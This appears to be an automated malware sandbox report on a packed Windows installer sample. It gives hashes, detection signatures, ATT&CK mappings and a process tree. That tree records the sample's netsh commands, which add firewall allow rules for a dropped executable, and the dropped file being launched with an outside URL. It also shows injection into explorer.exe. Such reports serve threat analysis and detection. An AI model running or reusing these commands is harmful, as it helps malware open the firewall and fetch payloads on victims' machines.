Overview
overview
8Static
static
79e4e79e286...26.exe
windows7-x64
89e4e79e286...26.exe
windows10-2004-x64
8$PLUGINSDI...el.dll
windows7-x64
7$PLUGINSDI...el.dll
windows10-2004-x64
7$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$_58_/Basi...r1.exe
windows7-x64
3$_58_/Basi...r1.exe
windows10-2004-x64
3$_58_/winr...01.exe
windows7-x64
5$_58_/winr...01.exe
windows10-2004-x64
1$_58_/wtzl...hu.exe
windows7-x64
3$_58_/wtzl...hu.exe
windows10-2004-x64
3Analysis
-
max time kernel
94s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
01-02-2025 15:35
Behavioral task
behavioral1
Sample
9e4e79e286d47e03357aa63adedfe826.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
9e4e79e286d47e03357aa63adedfe826.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral7
Sample
$_58_/BasicCalculator1.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
$_58_/BasicCalculator1.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral9
Sample
$_58_/winrar-x64-701.exe
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
$_58_/winrar-x64-701.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral11
Sample
$_58_/wtzltypssnrzhu.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
$_58_/wtzltypssnrzhu.exe
Resource
win10v2004-20250129-en
General
-
Target
9e4e79e286d47e03357aa63adedfe826.exe
-
Size
3.7MB
-
MD5
9e4e79e286d47e03357aa63adedfe826
-
SHA1
1dd8464c591c2bc996d608d48400336a0640686d
-
SHA256
3bc58204a86ea506d6459ce56521bbd293ce2232f90057e8395e9012797ae989
-
SHA512
ab6d8be74862c5564fdb95f3ab7a701bd99ee9aa798410b520631fd526dee4f40804b7722b2f040fc4b3943d47d6f82cb2b7a62981d8dd64d2a76021433df002
-
SSDEEP
98304:80qQnTwOIaZ1a7hp6K+QAjN+J4ur2GNaA4P6mPACJDLws:8gT/VZ1a7OlZ+J4XGwXNPF0s
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 208 netsh.exe 1072 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x000200000001e868-15.dat acprotect behavioral2/memory/2736-17-0x0000000075180000-0x0000000075189000-memory.dmp acprotect -
Deletes itself 1 IoCs
pid Process 5016 explorer.exe -
Executes dropped EXE 1 IoCs
pid Process 1632 wtzltypssnrzhu.exe -
Loads dropped DLL 3 IoCs
pid Process 2736 9e4e79e286d47e03357aa63adedfe826.exe 2736 9e4e79e286d47e03357aa63adedfe826.exe 2736 9e4e79e286d47e03357aa63adedfe826.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2736 set thread context of 5016 2736 9e4e79e286d47e03357aa63adedfe826.exe 91 -
resource yara_rule behavioral2/files/0x000200000001e868-15.dat upx behavioral2/memory/2736-17-0x0000000075180000-0x0000000075189000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9e4e79e286d47e03357aa63adedfe826.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wtzltypssnrzhu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1632 wtzltypssnrzhu.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1632 wtzltypssnrzhu.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1632 wtzltypssnrzhu.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 2736 wrote to memory of 208 2736 9e4e79e286d47e03357aa63adedfe826.exe 84 PID 2736 wrote to memory of 208 2736 9e4e79e286d47e03357aa63adedfe826.exe 84 PID 2736 wrote to memory of 208 2736 9e4e79e286d47e03357aa63adedfe826.exe 84 PID 2736 wrote to memory of 1072 2736 9e4e79e286d47e03357aa63adedfe826.exe 88 PID 2736 wrote to memory of 1072 2736 9e4e79e286d47e03357aa63adedfe826.exe 88 PID 2736 wrote to memory of 1072 2736 9e4e79e286d47e03357aa63adedfe826.exe 88 PID 2736 wrote to memory of 1632 2736 9e4e79e286d47e03357aa63adedfe826.exe 90 PID 2736 wrote to memory of 1632 2736 9e4e79e286d47e03357aa63adedfe826.exe 90 PID 2736 wrote to memory of 1632 2736 9e4e79e286d47e03357aa63adedfe826.exe 90 PID 2736 wrote to memory of 5016 2736 9e4e79e286d47e03357aa63adedfe826.exe 91 PID 2736 wrote to memory of 5016 2736 9e4e79e286d47e03357aa63adedfe826.exe 91 PID 2736 wrote to memory of 5016 2736 9e4e79e286d47e03357aa63adedfe826.exe 91 PID 2736 wrote to memory of 5016 2736 9e4e79e286d47e03357aa63adedfe826.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\9e4e79e286d47e03357aa63adedfe826.exe"C:\Users\Admin\AppData\Local\Temp\9e4e79e286d47e03357aa63adedfe826.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=wtzltypssnrzhu dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\nsu786D.tmp\wtzltypssnrzhu.exe" enable=yes profile=public,private2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:208
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=wtzltypssnrzhu dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\nsu786D.tmp\wtzltypssnrzhu.exe" enable=yes profile=public,private2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1072
-
-
C:\Users\Admin\AppData\Local\Temp\nsu786D.tmp\wtzltypssnrzhu.exe"C:\Users\Admin\AppData\Local\Temp\nsu786D.tmp\wtzltypssnrzhu.exe" "http://www.marvburris.click" "C:\Users\Admin\AppData\Local\Temp\nsu786D.tmp\7297"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1632
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\system32\explorer.exe2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:5016
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5e5786e8703d651bc8bd4bfecf46d3844
SHA1fee5aa4b325deecbf69ccb6eadd89bd5ae59723f
SHA256d115bce0a787b4f895e700efe943695c8f1087782807d91d831f6015b0f98774
SHA512d14ad43a01db19428cd8ccd2fe101750860933409b5be2eb85a3e400efcd37b1b6425ce84e87a7fe46ecabc7b91c4b450259e624c178b86e194ba7da97957ba3
-
Filesize
7KB
MD511092c1d3fbb449a60695c44f9f3d183
SHA1b89d614755f2e943df4d510d87a7fc1a3bcf5a33
SHA2562cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77
SHA512c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a
-
Filesize
10KB
MD59916cd804c030ab91eabab4c3d1f39f6
SHA1d01995ac1f61a17211b0c942d38504e35ac89c1a
SHA2566920bf36c100c838c5fcc48b3665f660e0c158449ed1a42f64cb1c054cf90eef
SHA512db60ef4e82328841153114c002c7d7664c5f7b7e5a916ea106912a0fe5a9f86a4ffc0a8f062f3cc974982efbc9b0ee7ff56582efe77e34dca001fc8b79d8ccc4
-
Filesize
257B
MD5441f5c5c7933c16068a03d99bc8837c4
SHA176d1de63216c2c1218cf47a5d768a18952a1dcb3
SHA256f1cac503709c2acd9ab0a7d0e48a4abf2777d16052fee68830260a78359ec72f
SHA5125b8fa02b827993541841a2fd07a50e5d2c5a7f5ba35e0b282ed3a453e3f919d63f1c9432d922cc364027351c57d2b78f99f5f1469c86b581cc53acb76fdfc366